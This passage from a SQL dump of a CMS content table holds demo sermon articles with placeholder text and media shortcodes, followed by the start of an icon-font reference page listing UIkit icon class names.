'{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 5, 3, '', '', 1, 438, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(92, 172, 'Believe From The Heart', 'believe-from-the-heart', '<p>[audio src=\"images/demo/audio/sermon.mp3\" type=\"audio/mpeg\"][/audio]</p>\r\n<p class=\"dropcap\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec sit amet nibh. Vivamus non arcu. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam dapibus, tellus ac ornare aliquam, massa diam tristique urna, id faucibus lectus erat ut pede. Maecenas varius neque nec libero laoreet faucibus.</p>\r\n<p>[button href=\"#\"]Live Streaming[/button] [button color href=\"#\"]Download now[/button]</p>', '', 1, 32, '2014-08-01 12:06:00', 196, '', '2014-08-09 12:49:00', 42, 0, '0000-00-00 00:00:00', '2014-08-01 12:06:00', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 3, 2, '', '', 1, 439, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(93, 173, 'Faith Is Our Victory', 'faith-is-our-victory', '<p>[audio src=\"images/demo/audio/sermon.mp3\" type=\"audio/mpeg\"][/audio]</p>\r\n<p class=\"dropcap\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec sit amet nibh. Vivamus non arcu. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam dapibus, tellus ac ornare aliquam, massa diam tristique urna, id faucibus lectus erat ut pede. Maecenas varius neque nec libero laoreet faucibus.</p>\r\n<p>[button href=\"#\"]Live Streaming[/button] [button color href=\"#\"]Download now[/button]</p>', '', 1, 32, '2014-08-01 12:06:00', 196, '', '2014-08-09 12:48:54', 42, 0, '0000-00-00 00:00:00', '2014-08-01 12:06:00', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 3, 1, '', '', 1, 490, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(94, 174, 'Strait Is The Gate', 'strait-is-the-gate', '<p>[video width=\"372\" height=\"170\" poster=\"images/demo/video/live_stream_2.png\"][source type=\"video/mp4\" url=\"images/demo/video/envato_sting.mp4\"][/source][source type=\"video/ogg\" url=\"images/demo/video/envato_sting.ogv\"][/source][source type=\"video/webm\" url=\"images/demo/video/envato_sting.webm\"][/source][/video]</p>\r\n<p>[button href=\"#\"]Live Streaming[/button] [button color href=\"#\"]Download now[/button]</p>', '', 1, 32, '2014-08-01 12:06:00', 196, '', '2014-08-06 06:16:04', 42, 0, '0000-00-00 00:00:00', '2014-08-01 12:06:00', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 5, 0, '', '', 1, 396, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', '');
INSERT INTO `y57u5_content` (`id`, `asset_id`, `title`, `alias`, `introtext`, `fulltext`, `state`, `catid`, `created`, `created_by`, `created_by_alias`, `modified`, `modified_by`, `checked_out`, `checked_out_time`, `publish_up`, `publish_down`, `images`, `urls`, `attribs`, `version`, `ordering`, `metakey`, `metadesc`, `access`, `hits`, `metadata`, `featured`, `language`, `xreference`, `note`) VALUES
(95, 207, 'Icon Fonts', 'icon-fonts', '<div id=\"iconfonts\">\r\n[heading size=\"h2\" style=\"module-title\"]Web Application Icons[/heading]\r\n\r\n<ul class=\"uk-grid uk-grid-width-small-1-1 uk-grid-width-medium-1-2 uk-grid-width-large-1-4 list-icons\">\r\n    <li><i class=\"uk-icon-adjust\"></i> icon-adjust</li>\r\n    <li><i class=\"uk-icon-anchor\"></i> icon-anchor</li>\r\n    <li><i class=\"uk-icon-archive\"></i> icon-archive</li>\r\n    <li><i class=\"uk-icon-area-chart\"></i> icon-area-chart</li>\r\n    <li><i class=\"uk-icon-arrows\"></i> icon-arrows</li>\r\n    <li><i class=\"uk-icon-arrows-h\"></i> icon-arrows-h</li>\r\n    <li><i class=\"uk-icon-arrows-v\"></i> icon-arrows-v</li>\r\n    <li><i class=\"uk-icon-asterisk\"></i> icon-asterisk</li>\r\n    <li><i class=\"uk-icon-at\"></i> icon-at</li>\r\n    <li><i class=\"uk-icon-automobile\"></i> icon-automobile <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-balance-scale\"></i> icon-balance-scale</li>\r\n    <li><i class=\"uk-icon-ban\"></i> icon-ban</li>\r\n    <li><i class=\"uk-icon-bank\"></i> icon-bank <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-bar-chart\"></i> icon-bar-chart</li>\r\n    <li><i class=\"uk-icon-bar-chart-o\"></i> icon-bar-chart-o <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-barcode\"></i> icon-barcode</li>\r\n    <li><i class=\"uk-icon-bars\"></i> icon-bars</li>\r\n    <li><i class=\"uk-icon-battery-empty\"></i> icon-battery-empty <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-battery-0\"></i> icon-battery-0</li>\r\n    <li><i class=\"uk-icon-battery-quarter\"></i> icon-battery-quarter <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-battery-1\"></i> icon-battery-1</li>\r\n    <li><i class=\"uk-icon-battery-half\"></i> icon-battery-half <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-battery-2\"></i> icon-battery-2</li>\r\n    <li class=\"uk-text-truncate\"><i class=\"uk-icon-battery-three-quarters\"></i> icon-battery-three-quarters <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-battery-3\"></i> icon-battery-3</li>\r\n    <li><i class=\"uk-icon-battery-full\"></i> icon-battery-full <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-battery-4\"></i> icon-battery-4</li>\r\n    <li><i class=\"uk-icon-bed\"></i> icon-bed</li>\r\n    <li><i class=\"uk-icon-beer\"></i> icon-beer</li>\r\n    <li><i class=\"uk-icon-bell\"></i> icon-bell</li>\r\n    <li><i class=\"uk-icon-bell-o\"></i> icon-bell-o</li>\r\n    <li><i class=\"uk-icon-bell-slash\"></i> icon-bell-slash</li>\r\n    <li><i class=\"uk-icon-bell-slash-o\"></i> icon-bell-slash-o</li>\r\n    <li><i class=\"uk-icon-bicycle\"></i> icon-bicycle</li>\r\n    <li><i class=\"uk-icon-binoculars\"></i> icon-binoculars</li>\r\n    <li><i class=\"uk-icon-birthday-cake\"></i> icon-birthday-cake</li>\r\n    <li><i class=\"uk-icon-bolt\"></i> icon-bolt</li>\r\n    <li><i class=\"uk-icon-bomb\"></i> icon-bomb</li>\r\n    <li><i class=\"uk-icon-book\"></i> icon-book</li>\r\n    <li><i class=\"uk-icon-bookmark\"></i> icon-bookmark</li>\r\n    <li><i class=\"uk-icon-bookmark-o\"></i> icon-bookmark-o</li>\r\n    <li><i class=\"uk-icon-briefcase\"></i> icon-briefcase</li>\r\n    <li><i class=\"uk-icon-bug\"></i> icon-bug</li>\r\n    <li><i class=\"uk-icon-building\"></i> icon-building</li>\r\n    <li><i class=\"uk-icon-building-o\"></i> icon-building-o</li>\r\n    <li><i class=\"uk-icon-bullhorn\"></i> icon-bullhorn</li>\r\n    <li><i class=\"uk-icon-bullseye\"></i> icon-bullseye</li>\r\n    <li><i class=\"uk-icon-bus\"></i> icon-bus</li>\r\n    <li><i class=\"uk-icon-cab\"></i> icon-cab <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-calculator\"></i> icon-calculator</li>\r\n    <li><i class=\"uk-icon-calendar\"></i> icon-calendar</li>\r\n    <li><i class=\"uk-icon-calendar-check-o\"></i> icon-calendar-check-o</li>\r\n    <li><i class=\"uk-icon-calendar-minus-o\"></i> icon-calendar-minus-o</li>\r\n    <li><i class=\"uk-icon-calendar-o\"></i> icon-calendar-o</li>\r\n    <li><i class=\"uk-icon-calendar-plus-o\"></i> icon-calendar-plus-o</li>\r\n    <li><i class=\"uk-icon-calendar-times-o\"></i> icon-calendar-times-o</li>\r\n    <li><i class=\"uk-icon-camera\"></i> icon-camera</li>\r\n    <li><i class=\"uk-icon-camera-retro\"></i> icon-camera-retro</li>\r\n    <li><i class=\"uk-icon-car\"></i> icon-car</li>\r\n    <li><i class=\"uk-icon-caret-square-o-down\"></i> icon-caret-square-o-down</li>\r\n    <li><i class=\"uk-icon-caret-square-o-left\"></i> icon-caret-square-o-left</li>\r\n    <li><i class=\"uk-icon-caret-square-o-right\"></i> icon-caret-square-o-right</li>\r\n    <li><i class=\"uk-icon-caret-square-o-up\"></i> icon-caret-square-o-up</li>\r\n    <li><i class=\"uk-icon-cart-arrow-down\"></i> icon-cart-arrow-down</li>\r\n    <li><i class=\"uk-icon-cart-plus\"></i> icon-cart-plus</li>\r\n    <li><i class=\"uk-icon-cc\"></i> icon-cc</li>\r\n    <li><i class=\"uk-icon-certificate\"></i> icon-certificate</li>\r\n    <li><i class=\"uk-icon-check\"></i> icon-check</li>\r\n    <li><i class=\"uk-icon-check-circle\"></i> icon-check-circle</li>\r\n    <li><i class=\"uk-icon-check-circle-o\"></i> icon-check-circle-o</li>\r\n    <li><i class=\"uk-icon-check-square\"></i> icon-check-square</li>\r\n    <li><i class=\"uk-icon-check-square-o\"></i> icon-check-square-o</li>\r\n    <li><i class=\"uk-icon-child\"></i> icon-child</li>\r\n    <li><i class=\"uk-icon-circle\"></i> icon-circle</li>\r\n    <li><i class=\"uk-icon-circle-o\"></i> icon-circle-o</li>\r\n    <li><i class=\"uk-icon-circle-o-notch\"></i> icon-circle-o-notch</li>\r\n    <li><i class=\"uk-icon-circle-thin\"></i> icon-circle-thin</li>\r\n    <li><i class=\"uk-icon-clock-o\"></i> icon-clock-o</li>\r\n    <li><i class=\"uk-icon-clone\"></i> icon-clone</li>\r\n    <li><i class=\"uk-icon-close\"></i> icon-close <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-cloud\"></i> icon-cloud</li>\r\n    <li><i class=\"uk-icon-cloud-download\"></i> icon-cloud-download</li>\r\n    <li><i class=\"uk-icon-cloud-upload\"></i> icon-cloud-upload</li>\r\n    <li><i class=\"uk-icon-code\"></i> icon-code</li>\r\n    <li><i class=\"uk-icon-code-fork\"></i> icon-code-fork</li>\r\n    <li><i class=\"uk-icon-coffee\"></i> icon-coffee</li>\r\n    <li><i class=\"uk-icon-cog\"></i> icon-cog</li>\r\n    <li><i class=\"uk-icon-cogs\"></i> icon-cogs</li>\r\n    <li><i class=\"uk-icon-comment\"></i> icon-comment</li>\r\n    <li><i class=\"uk-icon-comment-o\"></i> icon-comment-o</li>\r\n    <li><i class=\"uk-icon-commenting\"></i> icon-commenting</li>\r\n    <li><i class=\"uk-icon-commenting-o\"></i> icon-commenting-o</li>\r\n    <li><i class=\"uk-icon-comments\"></i> icon-comments</li>\r\n    <li><i class=\"uk-icon-comments-o\"></i> icon-comments-o</li>\r\n    <li><i class=\"uk-icon-compass\"></i> icon-compass</li>\r\n    <li><i class=\"uk-icon-copyright\"></i> icon-copyright</li>\r\n    <li><i class=\"uk-icon-creative-commons\"></i> icon-creative-commons</li>\r\n    <li><i class=\"uk-icon-credit-card\"></i> icon-credit-card</li>\r\n    <li><i class=\"uk-icon-crop\"></i> icon-crop</li>\r\n    <li><i class=\"uk-icon-crosshairs\"></i> icon-crosshairs</li>\r\n    <li><i class=\"uk-icon-cube\"></i> icon-cube</li>\r\n    <li><i class=\"uk-icon-cubes\"></i> icon-cubes</li>\r\n    <li><i class=\"uk-icon-cutlery\"></i> icon-cutlery</li>\r\n    <li><i class=\"uk-icon-dashboard\"></i> icon-dashboard <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-database\"></i> icon-database</li>\r\n    <li><i class=\"uk-icon-desktop\"></i> icon-desktop</li>\r\n    <li><i class=\"uk-icon-diamond\"></i> icon-diamond</li>\r\n    <li><i class=\"uk-icon-dot-circle-o\"></i> icon-dot-circle-o</li>\r\n    <li><i class=\"uk-icon-download\"></i> icon-download</li>\r\n    <li><i class=\"uk-icon-edit\"></i> icon-edit <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-ellipsis-h\"></i> icon-ellipsis-h</li>\r\n    <li><i class=\"uk-icon-ellipsis-v\"></i> icon-ellipsis-v</li>\r\n    <li><i class=\"uk-icon-envelope\"></i> icon-envelope</li>\r\n    <li><i class=\"uk-icon-envelope-o\"></i> icon-envelope-o</li>\r\n    <li><i class=\"uk-icon-envelope-square\"></i> icon-envelope-square</li>\r\n    <li><i class=\"uk-icon-eraser\"></i> icon-eraser</li>\r\n    <li><i class=\"uk-icon-exchange\"></i> icon-exchange</li>\r\n    <li><i class=\"uk-icon-exclamation\"></i> icon-exclamation</li>\r\n    <li><i class=\"uk-icon-exclamation-circle\"></i> icon-exclamation-circle</li>\r\n    <li><i class=\"uk-icon-exclamation-triangle\"></i> icon-exclamation-triangle</li>\r\n    <li><i class=\"uk-icon-external-link\"></i> icon-external-link</li>\r\n    <li><i class=\"uk-icon-external-link-square\"></i> icon-external-link-square</li>\r\n    <li><i class=\"uk-icon-eye\"></i> icon-eye</li>\r\n    <li><i class=\"uk-icon-eye-slash\"></i> icon-eye-slash</li>\r\n    <li><i class=\"uk-icon-eyedropper\"></i> icon-eyedropper</li>\r\n    <li><i class=\"uk-icon-fax\"></i> icon-fax</li>\r\n    <li><i class=\"uk-icon-female\"></i> icon-female</li>\r\n    <li><i class=\"uk-icon-fighter-jet\"></i> icon-fighter-jet</li>\r\n    <li><i class=\"uk-icon-file-archive-o\"></i> icon-file-archive-o</li>\r\n    <li><i class=\"uk-icon-file-audio-o\"></i> icon-file-audio-o</li>\r\n    <li><i class=\"uk-icon-file-code-o\"></i> icon-file-code-o</li>\r\n    <li><i class=\"uk-icon-file-excel-o\"></i> icon-file-excel-o</li>\r\n    <li><i class=\"uk-icon-file-image-o\"></i> icon-file-image-o</li>\r\n    <li><i class=\"uk-icon-file-movie-o\"></i> icon-file-movie-o <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-file-pdf-o\"></i> icon-file-pdf-o</li>\r\n    <li><i class=\"uk-icon-file-photo-o\"></i> icon-file-photo-o <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-file-picture-o\"></i> icon-file-picture-o <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-file-powerpoint-o\"></i> icon-file-powerpoint-o</li>\r\n    <li><i class=\"uk-icon-file-sound-o\"></i> icon-file-sound-o <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-file-video-o\"></i> icon-file-video-o</li>\r\n    <li><i class=\"uk-icon-file-word-o\"></i> icon-file-word-o</li>\r\n    <li><i class=\"uk-icon-file-zip-o\"></i> icon-file-zip-o <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-film\"></i> icon-film</li>\r\n    <li><i class=\"uk-icon-filter\"></i> icon-filter</li>\r\n    <li><i class=\"uk-icon-fire\"></i> icon-fire</li>\r\n    <li><i class=\"uk-icon-fire-extinguisher\"></i> icon-fire-extinguisher</li>\r\n    <li><i class=\"uk-icon-flag\"></i> icon-flag</li>\r\n    <li><i class=\"uk-icon-flag-checkered\"></i> icon-flag-checkered</li>\r\n    <li><i class=\"uk-icon-flag-o\"></i> icon-flag-o</li>\r\n    <li><i class=\"uk-icon-flash\"></i> icon-flash <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-flask\"></i> icon-flask</li>\r\n    <li><i class=\"uk-icon-folder\"></i> icon-folder</li>\r\n    <li><i class=\"uk-icon-folder-o\"></i> icon-folder-o</li>\r\n    <li><i class=\"uk-icon-folder-open\"></i> icon-folder-open</li>\r\n    <li><i class=\"uk-icon-folder-open-o\"></i> icon-folder-open-o</li>\r\n    <li><i class=\"uk-icon-frown-o\"></i> icon-frown-o</li>\r\n    <li><i class=\"uk-icon-futbol-o\"></i> icon-futbol-o</li>\r\n    <li><i class=\"uk-icon-gamepad\"></i> icon-gamepad</li>\r\n    <li><i class=\"uk-icon-gavel\"></i> icon-gavel</li>\r\n    <li><i class=\"uk-icon-gear\"></i> icon-gear <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-gears\"></i> icon-gears <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-genderless\"></i> icon-genderless <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-gift\"></i> icon-gift</li>\r\n    <li><i class=\"uk-icon-glass\"></i> icon-glass</li>\r\n    <li><i class=\"uk-icon-globe\"></i> icon-globe</li>\r\n    <li><i class=\"uk-icon-graduation-cap\"></i> icon-graduation-cap</li>\r\n    <li><i class=\"uk-icon-group\"></i> icon-group <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-hand-lizard-o\"></i> icon-hand-lizard-o</li>\r\n    <li><i class=\"uk-icon-hand-stop-o\"></i> icon-hand-stop-o <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-hand-paper-o\"></i> icon-hand-paper-o</li>\r\n    <li><i class=\"uk-icon-hand-peace-o\"></i> icon-hand-peace-o</li>\r\n    <li><i class=\"uk-icon-hand-pointer-o\"></i> icon-hand-pointer-o</li>\r\n    <li><i class=\"uk-icon-hand-grab-o\"></i> icon-hand-grab-o <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-hand-rock-o\"></i> icon-hand-rock-o</li>\r\n    <li><i class=\"uk-icon-hand-scissors-o\"></i> icon-hand-scissors-o</li>\r\n    <li><i class=\"uk-icon-hand-spock-o\"></i> icon-hand-spock-o</li>\r\n    <li><i class=\"uk-icon-hdd-o\"></i> icon-hdd-o</li>\r\n    <li><i class=\"uk-icon-headphones\"></i> icon-headphones</li>\r\n    <li><i class=\"uk-icon-heart\"></i> icon-heart</li>\r\n    <li><i class=\"uk-icon-heart-o\"></i> icon-heart-o</li>\r\n    <li><i class=\"uk-icon-heartbeat\"></i> icon-heartbeat</li>\r\n    <li><i class=\"uk-icon-history\"></i> icon-history</li>\r\n    <li><i class=\"uk-icon-home\"></i> icon-home</li>\r\n    <li><i class=\"uk-icon-hotel\"></i> icon-hotel <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-hourglass\"></i> icon-hourglass</li>\r\n    <li><i class=\"uk-icon-hourglass-o\"></i> icon-hourglass-o</li>\r\n    <li><i class=\"uk-icon-hourglass-1\"></i> icon-hourglass-1 <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-hourglass-start\"></i> icon-hourglass-start</li>\r\n    <li><i class=\"uk-icon-hourglass-2\"></i> icon-hourglass-2 <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-hourglass-half\"></i> icon-hourglass-half</li>\r\n    <li><i class=\"uk-icon-hourglass-3\"></i> icon-hourglass-3 <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-hourglass-end\"></i> icon-hourglass-end</li>\r\n    <li><i class=\"uk-icon-i-cursor\"></i> icon-i-cursor</li>\r\n    <li><i class=\"uk-icon-image\"></i> icon-image <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-inbox\"></i> icon-inbox</li>\r\n    <li><i class=\"uk-icon-industry\"></i> icon-industry</li>\r\n    <li><i class=\"uk-icon-info\"></i> icon-info</li>\r\n    <li><i class=\"uk-icon-info-circle\"></i> icon-info-circle</li>\r\n    <li><i class=\"uk-icon-institution\"></i> icon-institution <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-key\"></i> icon-key</li>\r\n    <li><i class=\"uk-icon-keyboard-o\"></i> icon-keyboard-o</li>\r\n    <li><i class=\"uk-icon-language\"></i> icon-language</li>\r\n    <li><i class=\"uk-icon-laptop\"></i> icon-laptop</li>\r\n    <li><i class=\"uk-icon-leaf\"></i> icon-leaf</li>\r\n    <li><i class=\"uk-icon-legal\"></i> icon-legal <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-lemon-o\"></i> icon-lemon-o</li>\r\n    <li><i class=\"uk-icon-level-down\"></i> icon-level-down</li>\r\n    <li><i class=\"uk-icon-level-up\"></i> icon-level-up</li>\r\n    <li><i class=\"uk-icon-life-bouy\"></i> icon-life-bouy <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-life-buoy\"></i> icon-life-buoy <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-life-ring\"></i> icon-life-ring</li>\r\n    <li><i class=\"uk-icon-life-saver\"></i> icon-life-saver <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-lightbulb-o\"></i> icon-lightbulb-o</li>\r\n    <li><i class=\"uk-icon-line-chart\"></i> icon-line-chart</li>\r\n    <li><i class=\"uk-icon-location-arrow\"></i> icon-location-arrow</li>\r\n    <li><i class=\"uk-icon-lock\"></i> icon-lock</li>\r\n    <li><i class=\"uk-icon-magic\"></i> icon-magic</li>\r\n    <li><i class=\"uk-icon-magnet\"></i> icon-magnet</li>\r\n    <li><i class=\"uk-icon-mail-forward\"></i> icon-mail-forward <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-mail-reply\"></i> icon-mail-reply <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-mail-reply-all\"></i> icon-mail-reply-all <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-male\"></i> icon-male</li>\r\n    <li><i class=\"uk-icon-map\"></i> icon-map</li>\r\n    <li><i class=\"uk-icon-map-marker\"></i> icon-map-marker</li>\r\n    <li><i class=\"uk-icon-map-o\"></i> icon-map-o</li>\r\n    <li><i class=\"uk-icon-map-pin\"></i> icon-map-pin</li>\r\n    <li><i class=\"uk-icon-map-signs\"></i> icon-map-signs</li>\r\n    <li><i class=\"uk-icon-meh-o\"></i> icon-meh-o</li>\r\n    <li><i class=\"uk-icon-microphone\"></i> icon-microphone</li>\r\n    <li><i class=\"uk-icon-microphone-slash\"></i> icon-microphone-slash</li>\r\n    <li><i class=\"uk-icon-minus\"></i> icon-minus</li>\r\n    <li><i class=\"uk-icon-minus-circle\"></i> icon-minus-circle</li>\r\n    <li><i class=\"uk-icon-minus-square\"></i> icon-minus-square</li>\r\n    <li><i class=\"uk-icon-minus-square-o\"></i> icon-minus-square-o</li>\r\n    <li><i class=\"uk-icon-mobile\"></i> icon-mobile</li>\r\n    <li><i class=\"uk-icon-mobile-phone\"></i> icon-mobile-phone <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-money\"></i> icon-money</li>\r\n    <li><i class=\"uk-icon-moon-o\"></i> icon-moon-o</li>\r\n    <li><i class=\"uk-icon-mortar-board\"></i> icon-mortar-board <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-motorcycle\"></i> icon-motorcycle</li>\r\n    <li><i class=\"uk-icon-mouse-pointer\"></i> icon-mouse-pointer</li>\r\n    <li><i class=\"uk-icon-music\"></i> icon-music</li>\r\n    <li><i class=\"uk-icon-navicon\"></i> icon-navicon <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-newspaper-o\"></i> icon-newspaper-o</li>\r\n    <li><i class=\"uk-icon-object-group\"></i> icon-object-group</li>\r\n    <li><i class=\"uk-icon-object-ungroup\"></i> icon-object-ungroup</li>\r\n    <li><i class=\"uk-icon-paint-brush\"></i> icon-paint-brush</li>\r\n    <li><i class=\"uk-icon-paper-plane\"></i> icon-paper-plane</li>\r\n    <li><i class=\"uk-icon-paper-plane-o\"></i> icon-paper-plane-o</li>\r\n    <li><i class=\"uk-icon-paw\"></i> icon-paw</li>\r\n    <li><i class=\"uk-icon-pencil\"></i> icon-pencil</li>\r\n    <li><i class=\"uk-icon-pencil-square\"></i> icon-pencil-square</li>\r\n    <li><i class=\"uk-icon-pencil-square-o\"></i> icon-pencil-square-o</li>\r\n    <li><i class=\"uk-icon-phone\"></i> icon-phone</li>\r\n    <li><i class=\"uk-icon-phone-square\"></i> icon-phone-square</li>\r\n    <li><i class=\"uk-icon-photo\"></i> icon-photo <span class=\"uk-text-muted\">(alias)</span></li>\r\n    <li><i class=\"uk-icon-picture-o\"></i> icon-picture-o</li>\r\n    <li><i class=\"uk-icon-pie-chart\"></i> icon-pie-chart</li>\r\n    <li><i class=\"uk-icon-plane\"></i> icon-plane</li>\r\n    <li><i class=\"uk-icon-plug\"></i> icon-plug</li>\r\n    <li><i class=\"uk-icon-plus\"></i> icon-plus</li>\r\n    <li><i class=\"uk-icon-plus-circle\"></i> icon-plus-circle</li>\r\n    <li><i class=\"uk-icon-plus-square\"></i> icon-plus-square</li>\r\n    <li><i class=\"uk-icon-plus-square-o\"></i> icon-plus-square-o</li>\r\n    <li><i class=\"uk-icon-power-off\"></i> icon-power-off</li>\r\n    <li><i class=\"uk-icon-print\"></i> icon-print</li>\r\n    <li><i class=\"uk-icon-puzzle-piece\"></i> icon-puzzle-piece</li>\r\n    <li><i class=\"uk-icon-qrcode\"></i> icon-qrcode</li>\r\n    <li><i class=\"uk-icon-question\"></i> 